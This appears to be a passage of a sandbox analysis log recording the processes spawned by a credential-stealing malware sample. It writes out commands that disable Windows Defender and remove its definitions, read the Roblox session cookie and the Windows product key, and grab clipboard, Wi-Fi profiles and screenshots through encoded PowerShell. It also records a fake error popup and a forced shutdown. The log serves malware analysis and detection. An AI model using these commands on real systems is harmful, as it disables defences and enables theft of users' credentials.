                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe "C:\Users\user\AppData\Roaming\word.exe"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe "C:\Users\user\AppData\Roaming\word.exe"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe /f /s /t 0
                      Source: C:\Windows\System32\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ClipboardJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
